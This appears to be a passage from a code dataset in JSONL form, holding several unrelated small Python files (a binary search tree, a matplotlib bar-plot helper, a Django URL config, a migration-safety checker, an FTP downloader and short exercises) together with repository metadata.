listOfVertex\n config.default = default\n config.objTest = bentuk.objek(is3D,listOfVertex,default)\n\n def reset():\n config.vecCam3D = np.mat([[config.camX3D,config.camY3D,config.camZ3D,1]])\n config.tegakLurusCam3D = np.mat([[config.camX3D,0,config.camZ3D,1]]) * rotasiY(90)\n config.objTest = bentuk.objek(config.is3D,config.listOfVertex,config.default)\n\n def putarCamY(derajat):\n #Memutar vector kamera 3D dengan sb Y positif sebagai pusat\n config.vecCam3D *= rotasiY(derajat)\n config.tegakLurusCam3D *= rotasiY(derajat)\n def putarCam(derajat,vx,vy,vz):\n config.vecCam3D *= rotasi(derajat,vx,vy,vz)\n def zoomCam(k):\n config.vecCam3D *= dilate(k,config.is3D)\n","repo_name":"AdityaPutraS/Tubes-Algeo-2","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22979404335","text":"#!/usr/bin/python\n\nimport spidev\nimport sys\n\n# First byte is ignored (slave returns 0xEE)\nmsg = [ 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80 ]\n\nspi = spidev.SpiDev()\nspi.open(0,1)\nspi.mode = 0b00\nspi.max_speed_hz = 10000000\nspi.bits_per_word = 8\n\nresp = spi.xfer(msg)\n\noutput = []\nfor i in resp:\n output.append(hex(i))\nprint(output)\n","repo_name":"eigenform/metagecko","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38641071220","text":"# 3. Write a program that asks the user to enter a value n, and then computes (1 + 1\\2 + 1\\3 + ... + 1\\n) −\n# ln(n). The ln function is 'log' in the 'math' module.\n\nfrom math import log\n\nn = eval(input('Enter a value: '))\n\nanswer = 0\nfor i in range(1, n + 1):\n answer += 1 / i\nanswer -= log(n)\n\nprint(answer)\n","repo_name":"ahr9n/awesome-reading","sub_path":"a-practical-introduction-to-python-programming-brian-heinold/chapter-05/exercise-03.py","file_name":"exercise-03.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"38584196508","text":"class bst:\r\n def __init__(self,data):\r\n self.data=data\r\n self.lefttree=None\r\n self.righttree=None\r\n\r\n def insert(self,data):\r\n if self.data is None:\r\n self.data=data\r\n return\r\n if self.data==data:\r\n return\r\n if self.data>data:\r\n if self.lefttree is None:\r\n self.lefttree=bst(data)\r\n else:\r\n self.lefttree.insert(data)\r\n else:\r\n if self.righttree is None:\r\n self.righttree=bst(data)\r\n else:\r\n self.righttree.insert(data)\r\n\r\n def search(self,data):\r\n if self.data is None:\r\n print(\"tree has no value\")\r\n return\r\n if self.data==data:\r\n print(\"element is found\")\r\n return\r\n if self.data>data:\r\n if self.lefttree is None:\r\n print(\"element is not found \")\r\n else:\r\n self.lefttree.search(data)\r\n else:\r\n if self.righttree is None:\r\n print(\"element is not found\")\r\n else:\r\n self.righttree.search(data)\r\n def preorder(self):\r\n print(self.data,\"\",end=\"\")\r\n if self.lefttree is not None:\r\n self.lefttree.preorder()\r\n if self.righttree is not None:\r\n self.righttree.preorder()\r\n\r\n def inorder(self):\r\n if self.lefttree is not None:\r\n self.lefttree.inorder()\r\n print(self.data,\"\",end=\"\")\r\n if self.righttree is not None:\r\n self.righttree.inorder()\r\n\r\n def postorder(self):\r\n if self.lefttree is not None:\r\n self.lefttree.postorder()\r\n if self.righttree is not None:\r\n self.righttree.postorder()\r\n print(self.data,\"\",end=\"\")\r\n def delete(self,data):\r\n if self.data is None:\r\n print(\"tree is empty\")\r\n return\r\n if self.data>data:\r\n if self.lefttree is None:\r\n print(\"elemwnt is not present \")\r\n else:\r\n self.lefttree=self.lefttree.delete(data)\r\n elif self.data< data:\r\n if self.righttree is None:\r\n print(\"eelement is not present \")\r\n else:\r\n self.righttree=self.righttree.delete(data)\r\n else:\r\n if self.lefttree is None:\r\n temp=self.righttree\r\n self.data=None\r\n return temp\r\n if self.righttree is None:\r\n temp=self.lefttree\r\n self.data=None\r\n return temp\r\n node=self.righttree\r\n while node.righttree is not None:\r\n node=node.lefttree\r\n self.data=node.data\r\n self.righttree=self.righttree.delete(node.data)\r\n return self.data\r\ndef count(node):\r\n if node is None:\r\n return 0\r\n return 1+count(node.lefttree)+count(node.righttree)\r\nroot=bst(None)\r\nlist=[5,75,25,24,4,1,3]\r\nfor x in list:\r\n root.insert(x)\r\nprint(\" the element in tree is :\",count(root))\r\nif count(root)>1:\r\n root.delete(24)\r\nelse:\r\n print(\"canit perform delete operation\")\r\nprint(\"preorder traversal \")\r\nroot.preorder()\r\nprint(\" inorder traversal\")\r\nroot.inorder()\r\nprint(\"post order \")\r\nroot.postorder()","repo_name":"abhaymanhas19/Datastructures-pythonprograms","sub_path":"binary search tree.py","file_name":"binary search tree.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9788674666","text":"from comandor.log import log, FORMAT, DATEFMT\nfrom comandor.models import Setting\n\nfrom pydantic import ValidationError\nfrom typing import List\n\nimport yaml\nimport json\nimport sys\nimport os\n\n\ndef loadSetting(file: str = \".comandor\") -> Setting:\n if not os.path.exists(file):\n raise Exception(f\"Config file not found! {file}\")\n\n setting: Setting\n\n with open(file, \"r\") as f:\n try:\n op = json.load(f)\n\n except json.JSONDecodeError as e:\n\n with open(file, \"r\") as f:\n try:\n op = yaml.safe_load(f)\n\n except yaml.error.YAMLError as err:\n log.error(\"pars conf error\", e, err)\n raise\n\n try:\n setting = Setting(**op)\n except ValidationError as e:\n log.error(e)\n raise e\n\n return setting\n\n\ndef newConfig(\n logfile: str, config: str,\n debug: bool, skip: str) -> Setting:\n\n setting: Setting = loadSetting(config)\n level: int = log.INFO\n handlers: List = []\n\n if debug or setting.debug:\n level = log.DEBUG\n\n if logfile or setting.logfile:\n filename = logfile or str(setting.logfile)\n filemode = \"a\"\n handlers = [\n log.FileHandler(filename, filemode),\n log.StreamHandler(sys.stdout)\n ]\n\n log.basicConfig(\n level=level,\n format=FORMAT,\n datefmt=DATEFMT,\n handlers=handlers)\n\n if debug or setting.debug:\n log.debug(\"run debug mode!\")\n\n if skip != \"\":\n log.warn(f\"remove action with this match: {skip}\")\n for ac in setting.actions:\n if ac.action_name.find(skip) != -1:\n setting.actions.remove(ac)\n\n log.debug(\"logger configure!\")\n log.debug(\"loaded Setting!\")\n return setting\n\n\n__all__ = [\n \"newConfig\",\n \"Setting\",\n]\n","repo_name":"NoobforAl/comandor","sub_path":"comandor/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25816184136","text":"from cProfile import label\nimport os, sys\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport matplotlib.patches as mpl_patches\n\nfrom pyearth.system.define_global_variables import *\n\nfrom pyearth.visual.color.create_diverge_rgb_color_hex import create_diverge_rgb_color_hex\n\ndef barplot_data_with_reference(aData_in,\\\n aLabel_x_in,\\\n aLabel_y_in,\\\n sFilename_out,\\\n aLabel_z_in=None,\\\n aData_reference_in=None,\\\n aLabel_legend_reference_in=None,\\\n iDPI_in = None,\\\n iFlag_scientific_notation_in=None,\\\n ncolumn_in = None,\\\n iSize_x_in = None, \\\n iSize_y_in = None, \\\n dMax_y_in = None, \\\n dMin_y_in = None, \\\n dSpace_y_in = None,\\\n aMarker_in = None,\\\n aColor_in = None,\\\n aHatch_in = None,\\\n sLabel_info_in = None,\\\n sLabel_y_in = None, \\\n \n aLinestyle_in = None,\\\n aLocation_legend_in =None,\\\n sFormat_y_in =None,\\\n sLocation_legend_in=None,\\\n sTitle_in = None):\n\n aData_in = np.array(aData_in)\n aData_reference_in=np.array(aData_reference_in)\n pShape = aData_in.shape\n ndim=aData_in.ndim\n if ndim==2:\n iFlag_sub=0\n nCat= pShape[0] \n nData = pShape[1] \n \n else:\n iFlag_sub=1\n nCat= pShape[0] \n nsub=pShape[1] \n nData = pShape[2] \n\n if aData_reference_in is not None:\n iFlag_ref=1\n nData_reference=aData_reference_in.shape[0]\n\n else:\n iFlag_ref=0\n\n if iFlag_scientific_notation_in is not None:\n iFlag_scientific_notation = 1\n else:\n iFlag_scientific_notation = 0\n\n if iDPI_in is not None:\n iDPI = iDPI_in\n else:\n iDPI = 300\n\n if iSize_x_in is not None:\n iSize_x = iSize_x_in\n else:\n iSize_x = 12\n\n if iSize_y_in is not None:\n iSize_y = iSize_y_in\n else:\n iSize_y = 9\n\n if dMax_y_in is not None:\n dMax_y = dMax_y_in\n else:\n dMax_y = np.nanmax(aData_in) * 1.0\n\n if dMin_y_in is not None:\n dMin_y = dMin_y_in\n else:\n dMin_y = np.nanmin(aData_in) #if it has negative value, change here\n\n if (dMax_y <= dMin_y ):\n return\n\n if sLabel_y_in is not None:\n sLabel_y = sLabel_y_in\n else:\n sLabel_y = ''\n\n if sTitle_in is not None:\n sTitle = sTitle_in\n else:\n sTitle = ''\n\n if sFormat_y_in is not None:\n iFlag_format_y = 1\n sFormat_y = sFormat_y_in\n else:\n iFlag_format_y = 0\n\n if sLocation_legend_in is not None:\n sLocation_legend = sLocation_legend_in\n else:\n sLocation_legend = \"upper right\"\n\n if aLocation_legend_in is not None:\n aLocation_legend = aLocation_legend_in\n else:\n aLocation_legend=(1.0,1.0)\n\n if ncolumn_in is not None:\n ncolumn = ncolumn_in\n else:\n ncolumn = 1\n\n if aColor_in is not None:\n aColor = aColor_in\n else:\n if(nData>=3):\n aColor= create_diverge_rgb_color_hex(nData+nData_reference)\n else:\n if nData==2:\n aColor= ['red','blue']\n else:\n aColor=['red']\n\n if aHatch_in is not None:\n aHatch = aHatch_in\n else:\n aHatch= np.fill(nData, '+')\n\n fig = plt.figure( dpi=iDPI )\n fig.set_figwidth( iSize_x )\n fig.set_figheight( iSize_y )\n ax = fig.add_axes([0.1, 0.5, 0.8, 0.4] )\n x = np.arange( len(aLabel_x_in) )\n dMin_x = -0.5\n dMax_x = len(aLabel_x_in)-0.5\n\n \n \n ax.set_ylabel(sLabel_y,fontsize=14)\n ax.set_title(sTitle,fontsize=14)\n ax.set_xticks(x)\n ax.set_xticklabels(aLabel_x_in)\n ax.tick_params(axis=\"x\", labelsize=15)\n ax.tick_params(axis=\"y\", labelsize=15)\n\n total_width = 0.6\n \n leg_artists = []\n aLabel=[]\n if ndim==2:\n width = total_width / (nData)\n for i in range(0, nCat,1):\n for j in np.arange(0, nData, 1):\n data1 = aData_in[j,i]\n x1 = x[i] - total_width * 0.5 + (j+0.5) * width\n rects = ax.bar( x1, data1, width, label= aLabel_y_in[k], linestyle = aLinestyle_in[k],\\\n color = aColor[k], hatch = aHatch[k], edgecolor = \"k\")\n \n pass\n if iFlag_ref ==1:\n for i in aData_reference_in:\n x0 = [-1, nData-len(aReference_in)]\n y0 = [aData_in[i][0], aData_in[i][0]]\n ax.plot( x0, y0, \\\n color = aColor[i], linestyle = 'dashed' ,\\\n marker = aMarker_in[i] ,\\\n label = aLabel_y_in[i]) \n else:\n width = total_width / (nData * nsub)\n if iFlag_ref ==1:\n for i in range(nData_reference):\n x0 = [-1, nCat]\n y0 = [aData_reference_in[i], aData_reference_in[i]]\n line, =ax.plot( x0, y0, \\\n color = aColor[i+nData], linestyle = 'dashed' ,\\\n marker = aMarker_in[i] ,\\\n label = aLabel_legend_reference_in[i]) \n leg_artists.append(line)\n aLabel.append(aLabel_legend_reference_in[i])\n\n for i in range(0, nCat,1):\n for j in np.arange(0, nsub, 1):\n for k in np.arange(0, nData, 1):\n data1 = aData_in[i,j,k]\n x1 = x[i] - total_width * 0.5 + j*width + k * (width *2)\n #print(x1)\n if j==0 and i==0:\n rects, = ax.bar( x1, data1, width, label= aLabel_y_in[k], linestyle = aLinestyle_in[k],\\\n color = aColor[k], hatch = aHatch[j], edgecolor = \"k\")\n leg_artists.append(rects)\n aLabel.append(aLabel_y_in[k])\n\n else:\n rects, = ax.bar( x1, data1, width, linestyle = aLinestyle_in[k],\\\n color = aColor[k], hatch = aHatch[j], edgecolor = \"k\")\n \n \n \n \n pass\n\n if iFlag_scientific_notation ==1:\n formatter = ticker.ScalarFormatter(useMathText=True)\n formatter.set_scientific(True)\n #formatter.set_powerlimits((-1,1)) # you might need to change here\n ax.yaxis.set_major_formatter(formatter)\n #most time, when you use scientific notation, you may not need set the space,\n #but you may still set it using the method below\n pass\n \n\n if sLabel_info_in is not None:\n ax.text(0.1,0.9, sLabel_info_in, \\\n verticalalignment='center', horizontalalignment='left',\\\n transform=ax.transAxes, \\\n color='black', fontsize=13)\n\n if (iFlag_format_y ==1):\n ax.yaxis.set_major_formatter(ticker.FormatStrFormatter( sFormat_y ) )\n\n ax.set_xlim( dMin_x, dMax_x )\n ax.set_ylim( dMin_y, dMax_y )\n ax.grid(linewidth=1, color='gray', alpha=0.3, linestyle='--')\n\n \n #legend1= plt.legend(aBar, aLabel_y_in,\\\n # bbox_to_anchor=aLocation_legend, \\\n # loc=sLocation_legend, \\\n # fontsize=14, \\\n # ncol= ncolumn)\n \n\n if iFlag_sub==1:\n handles=list()\n #labels = []\n for i in range(nsub):\n #handles.append( \n p = mpl_patches.Rectangle((0, 0), 2, 2,hatch=aHatch[i],facecolor='w', label=aLabel_z_in[i]) # )\n \n #labels.append(aLabel_z_in[i])\n # create the legend, supressing the blank space of the empty line symbol and the\n # padding between symbol and label by setting handlelenght and handletextpad\n #legend2 = plt.legend(handles, bbox_to_anchor=(0.0,1.0), \\\n # loc='upper left', \\\n # fontsize=14, \\\n # ncol= ncolumn)\n\n leg_artists.append(p)\n aLabel.append(aLabel_z_in[i])\n \n\n \n #ax.add_artist(legend1)\n #ax.add_artist(legend2)\n ax.legend(leg_artists, aLabel, bbox_to_anchor=aLocation_legend, \\\n loc=sLocation_legend, \\\n fontsize=14, \\\n ncol= ncolumn)\n\n plt.savefig(sFilename_out, bbox_inches='tight')\n\n plt.close('all')\n plt.clf()\n\n\n return\n","repo_name":"changliao1025/pyearth","sub_path":"pyearth/visual/barplot/barplot_data_with_reference.py","file_name":"barplot_data_with_reference.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"13519142346","text":"from itertools import chain\n\n\nfiles = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\" ]\nsamples = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"]\n\ndef rules(ctx):\n natural(ctx)\n fast(ctx)\n\ndef natural(ctx):\n targets = [ \"natural/\" + s + \"/\" + f\n for s in samples\n for f in files ]\n ctx.add_rule(\n targets,\n [ \"input/\" + f\n for f in files ],\n [ [ \"cp\", \"input/\" + f, \"natural/\" + s ]\n for s in samples\n for f in files ] )\n\ndef fast(ctx):\n big_target = \"fast/phony\"\n ctx.add_rule(\n big_target,\n [ \"input/\" + f\n for f in files ],\n ( list( # turn the chain.iterable into a list\n chain.from_iterable( # concatenate the lists\n [ [ [ \"mkdir\", \"-p\", \"fast/\" + s ],\n [ \"cp\", \"input/\" + f, \"fast/\" + s ] ]\n for s in samples\n for f in files ] ) )\n + [[\"touch\", big_target]] ) )\n\n for s in samples:\n for f in files:\n small_target = \"fast/\" + s + \"/\" + f\n ctx.add_rule(\n small_target,\n [ big_target ],\n [ \"touch\", small_target ] ) # without this `touch`, `target`\n # would look out of date relative to its dependencies\n","repo_name":"ofiscal/tax.co","sub_path":"make.py-learning/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"11219063337","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('register/', views.register, name='register'),\n path('login/', views.login_user, name='login'),\n path('home/', views.home, name='home'),\n path('logout/', views.logout_user, name='logout'),\n path('', views.noargs),\n path('albums/details/', views.album_details, name='album_details'),\n path('add_album/', views.add_album, name='add_album'),\n path('delete_album/', views.delete_album, name='delete_album'),\n path('add_song_to_album/', views.add_song_to_album, name='add_song_to_album'),\n path('song_details/', views.song_details, name='song_details'),\n path('delete_song/', views.delete_song, name='delete_song'),\n path('artist_details/', views.artist_details, name='artist_details'),\n path('update_artist/', views.update_artist, name='update_artist'),\n path('new_playlist', views.create_playlist, name='new_playlist'),\n path('playlist_details/', views.playlist_details, name='playlist_details'),\n path('add_song_to_playlist/', views.add_song_to_playlist, name='add_song_to_playlist'),\n path('all_albums/', views.all_albums, name='all_albums'),\n path('delete_from_playlist//', views.delete_from_playlist, name='delete_from_playlist')\n]","repo_name":"yael-orozco/django_school_project","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888516649","text":"# 프로그래머스 카펫\n# https://school.programmers.co.kr/learn/courses/30/lessons/42842\n\ndef solution(brown, yellow):\n size = brown+yellow\n for i in range(3,size//3+1) :\n a = i\n b = size // a\n if brown == a*2 + b*2 - 4 and yellow == a*b-brown:\n return sorted([a,b], reverse = True)","repo_name":"do0134/solostudy","sub_path":"algorithm/4월/0405/4sol.py","file_name":"4sol.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39511323879","text":"import re\nimport sys\nfrom typing import List, Optional\n\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand, CommandError\n\n\ndef _get_new_tables(sql: str):\n return re.findall(r'CREATE TABLE \"([a-zA-Z0-9_]*)\"', sql)\n\n\ndef _get_table(search_string: str, operation_sql: str) -> Optional[str]:\n match = re.match(r'.*{} \"([a-zA-Z0-9_]*)\"'.format(search_string), operation_sql)\n if match:\n return match[1]\n return None\n\n\ndef validate_migration_sql(sql) -> bool:\n new_tables = _get_new_tables(sql)\n operations = sql.split(\"\\n\")\n tables_created_so_far: List[str] = []\n for operation_sql in operations:\n # Extract table name from queries of this format: ALTER TABLE TABLE \"posthog_feature\"\n table_being_altered: Optional[str] = (\n re.findall(r\"ALTER TABLE \\\"([a-z_]+)\\\"\", operation_sql)[0] if \"ALTER TABLE\" in operation_sql else None\n )\n # Extract table name from queries of this format: CREATE TABLE \"posthog_feature\"\n if \"CREATE TABLE\" in operation_sql:\n table_name = re.findall(r\"CREATE TABLE \\\"([a-z_]+)\\\"\", operation_sql)[0]\n tables_created_so_far.append(table_name)\n\n if '\"id\" serial' in operation_sql:\n print(\n f\"\\n\\n\\033[91mFound a new table with an int32 id. Please use an int64 id or use UUIDModel instead.\\nSource: `{operation_sql}`\"\n )\n return True\n\n if (\n re.findall(r\"(? 1:\n print(\n f\"\\n\\n\\033[91mFound multiple migrations. Please scope PRs to one migration to promote easy debugging and revertability\"\n )\n sys.exit(1)\n\n for data in migrations:\n run_and_check_migration(data)\n","repo_name":"PostHog/posthog","sub_path":"posthog/management/commands/test_migrations_are_safe.py","file_name":"test_migrations_are_safe.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"23725021224","text":"nota_1 = float(input('Nota 1: '))\nnota_2 = float(input('Nota 2: '))\n\nmedia = (nota_1 + nota_2) / 2\n\nprint(f'\\nTirando {nota_1:.1f} e {nota_2:.1f} a média do aluno é {media:.1f}')\n\nif media < 5:\n print('REPROVADO')\nelif 7 > media >= 5:\n print('RECUPERAÇÃO')\nelse:\n print('APROVADO')\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"curso_em_video/python/ex040.py","file_name":"ex040.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22269268500","text":"class Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n # base case\n if len(s)!=len(t):\n return False\n\n s=sorted(s)\n t=sorted(t)\n\n for i in range(len(s)):\n if s[i]!=t[i]:\n return False\n \n return True\n\n'''\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n # base case\n if len(s)!=len(t):\n return False\n\n wordsOfS={}\n\n for word in s:\n wordsOfS[word]=wordsOfS.get(word,0)+1\n \n countOfT=len(t)\n for word in t:\n if wordsOfS.get(word) and wordsOfS[word]!=0:\n wordsOfS[word]-=1\n countOfT-=1\n else:\n return False\n\n if countOfT!=0:\n return False\n return True\n\n# Time complexity -> O(n), n is length of string s\n# Space complexity -> O(s)\n'''\n","repo_name":"ofmukesh/Learning","sub_path":"DailyChallenge/isAnagram.py","file_name":"isAnagram.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34384740707","text":"import os\nimport threading\nimport traceback\nfrom tkinter import *\nfrom ftplib import FTP\n\n\nclass DownloadFtp(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.ftp = FTP()\n self.timeout = 30\n self.port = 21\n self.host = '………………'\n self.user = '……'\n self.password = '……'\n\n def ftp_connect(self):\n try:\n self.ftp.connect(self.host, self.port, self.timeout)\n self.ftp.login(self.user, self.password)\n text.insert(END, self.ftp.getwelcome() + '\\n')\n self.ftp.cwd('……/……')\n except:\n traceback.print_exc()\n\n def start_download(self):\n self.ftp_connect()\n ftp_list = self.ftp.nlst()\n for name in ftp_list:\n text.insert(END, u'获得文件:' + name.decode('gb2312') + '\\n')\n if not os.path.exists('py_auto_download/' + name):\n path = 'py_auto_download/' + name\n f = open(path, 'wb')\n filename = 'RETR ' + name\n text.insert(END, u'正在下载:' + name.decode('gb2312') + '\\n')\n self.ftp.retrbinary(filename, f.write)\n else:\n text.insert(END, u'文件或者文件夹已存在,忽略\\n')\n self.ftp.quit()\n\n\ndef button_ftp():\n if not os.path.exists('py_auto_download'):\n os.makedirs('py_auto_download')\n my_ftp = DownloadFtp()\n my_ftp.start()\n my_ftp.start_download()\n\n\ndef button_exec_sql():\n\n pass\n\n\nif __name__ == '__main__':\n root = Tk()\n root.title(u'自助操作端升级')\n root.geometry('300x400')\n root.resizable(width=False, height=False)\n text = Text(root)\n text.pack(side=TOP)\n\n frameButton = Frame(root)\n\n frameLButton = Frame(frameButton)\n buttonESQL = Button(frameLButton, text=u'升级本地SQL数据库', command=button_exec_sql)\n buttonESQL.pack(side=LEFT)\n frameLButton.pack(side=LEFT)\n\n frameRButton = Frame(frameButton)\n buttonFTP = Button(frameRButton, text=u'下载自助操作端升级包', command=button_ftp)\n buttonFTP.pack(side=RIGHT)\n frameRButton.pack(side=RIGHT)\n\n frameButton.pack()\n\n root.mainloop()","repo_name":"shasky2014/PythonLearning","sub_path":"test_gui/sadfsadsa.py","file_name":"sadfsadsa.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22398740893","text":"import sys\ninput = sys.stdin.readline\n\nt = int(input().rstrip())\n\narr = []\nresult = 0\nanswers = []\n\nfor i in range(t):\n n = int(input().rstrip())\n \n start = list(input().rstrip())\n goal = list(input().rstrip())\n\n for i in range(n):\n if start[i] != goal[i]:\n arr.append(start[i])\n \n if arr.count(\"B\") >= arr.count(\"W\"):\n result = arr.count(\"B\")\n else:\n result = arr.count(\"W\")\n \n answers.append(result)\n arr = []\n\nfor answer in answers:\n print(answer)","repo_name":"parksangmyeong1/Algorithm","sub_path":"Python/브루트포스/[BOJ]오셀로 재배치.py","file_name":"[BOJ]오셀로 재배치.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16582998545","text":"from qt import *\nfrom urldialog import UrlDialog\n\n\nclass UrlDialog_Impl(UrlDialog):\n\n\n targetList = {}\n\n def __init__(self,parent = None,name = None,modal = 0,fl = 0):\n UrlDialog.__init__(self,parent,name,modal,fl)\n # Hide these two until we've figured out how\n # to deal with them\n self.comboClass.hide()\n self.labelClass.hide()\n \n self.editUrl.setFocus()\n self.targetList['in new window'] = '_blank'\n self.targetList['in same window'] = '_top'\n self.targetList['in same frame'] = '_self'\n for key in self.targetList.keys():\n self.comboOpen.insertItem(key)\n\n def initValues(self, text):\n if text:\n self.editName.setText(text)\n\n def urltag(self):\n urltag = ' str:\r\n if len(string_list) == 0:#check for empty\r\n return \"\"#If empty return quotes\r\n \r\n length = [len(str) for str in string_list]#use string comprehension to take the length of string in the list\r\n max_length = max(length)\r\n result = \"\"\r\n \r\n for i in range(1, max_length+1):#for item in the range of strings we have\r\n common_string = string_list[0][:i]#assign the common portion of the string from initial character to the iterator\r\n for s in string_list:#iterate through the string list\r\n if s[:i] != common_string:#Check to what degree they are in common up to the iterator\r\n return result\r\n result = common_string\r\n return result\r\n","repo_name":"TheNomadicPyre/LeetCode-Solutions","sub_path":"Longest common Prefix.py","file_name":"Longest common Prefix.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21242500986","text":"import numpy as np\r\nfrom torch import optim\r\n\r\ndef get_optimizer(config, model):\r\n optimizer = base_optimizer(config, model)\r\n return optimizer\r\n\r\nclass base_optimizer(object):\r\n def __init__(self, config, model):\r\n super(base_optimizer, self).__init__()\r\n\r\n # optimizer\r\n if config.optimizer == 'Adam':\r\n self.optimizer = optim.Adam(model.parameters(), lr=config.lr)\r\n elif config.optimizer == 'Adadelta':\r\n self.optimizer = optim.Adadelta(model.parameters(), lr=config.lr)\r\n else:\r\n raise\r\n\r\n # scheduler\r\n if config.scheduler == 'ReduceLROnPlateau':\r\n from torch.optim.lr_scheduler import ReduceLROnPlateau\r\n self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', verbose=True)\r\n elif config.scheduler == 'StepLR':\r\n from torch.optim.lr_scheduler import StepLR\r\n self.scheduler = StepLR(self.optimizer, 100, gamma=0.1, last_epoch=-1)\r\n else:\r\n self.scheduler = None\r\n\r\n def update_model(self, loss):\r\n self.optimizer.zero_grad()\r\n\r\n if np.isnan(loss.item()):\r\n print('\\n\\n\\nERROR::: THE LOSS IS NAN\\n\\n\\n')\r\n raise()\r\n else:\r\n loss.backward()\r\n self.optimizer.step()\r\n return None\r\n\r\n def scheduler_step(self, metric):\r\n if self.scheduler is not None:\r\n self.scheduler.step(metric)\r\n return None","repo_name":"seharanul17/interactive_keypoint_estimation","sub_path":"misc/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"8797347729","text":"import sys\nsys.setrecursionlimit(100000000)\nN = int(input())\nG = [[] for _ in range(N)]\nfor _ in range(N-1):\n a,b = map(int,input().split())\n a -= 1\n b -= 1\n G[a].append(b)\n G[b].append(a)\nV = [0]*N\ndef dfs(i,vi):\n res = 1\n for ni in G[i]:\n if ni == vi:\n continue\n res += dfs(ni,i)\n V[i] = res\n return res\ndfs(0,0)\nans = 0\ndef dfs1(i,vi):\n global ans\n ans += (N-V[i])*V[i]\n for ni in G[i]:\n if ni == vi:\n continue\n dfs1(ni,i)\ndfs1(0,0)\nprint(ans)","repo_name":"shimamura10/Atcoder","sub_path":"典型90/39_2.py","file_name":"39_2.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10480865397","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n def getPath(cur_n, target):\n if cur_n == target:\n return [target]\n left = []\n if cur_n.left:\n left = getPath(cur_n.left, target)\n right = []\n if cur_n.right:\n right = getPath(cur_n.right, target)\n \n if not left and not right:\n return []\n \n return [cur_n] + left if left else [cur_n] + right \n\n p_path = getPath(root, p)\n q_path = getPath(root, q)\n\n i = 0\n while i < len(p_path) and i < len(q_path) and p_path[i] == q_path[i]:\n i += 1\n\n return p_path[i - 1]","repo_name":"Iliaromanov/Algos-and-DataStructs-Practice","sub_path":"Top_Interview_Questions/lowestCommonAncestor.py","file_name":"lowestCommonAncestor.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71594992809","text":"'''\nUsage: Transcribing_DNA_into_RNA.py data.txt\n'''\n\nimport sys\n\n\ndatafile = sys.argv[1]\n\nwith open(datafile, \"r\") as data:\n data = \"\".join(data.readlines())\n data_items = data\n\n\n# data_items = \"GATGGAACTTGACTACGTAAATT\"\n\n\n# for i in data_items:\n # i = i.replace(\"T\", \"U\")\nnewdata = data_items.replace(\"T\", \"U\")\nprint(newdata)\n\nwith open(\"output_file.txt\", \"w\") as output_file:\n # output_file.write(newdata)\n print(newdata, file=output_file)\n","repo_name":"cansakirt/python_scripts","sub_path":"Rosalind.info/2 - Transcribing DNA into 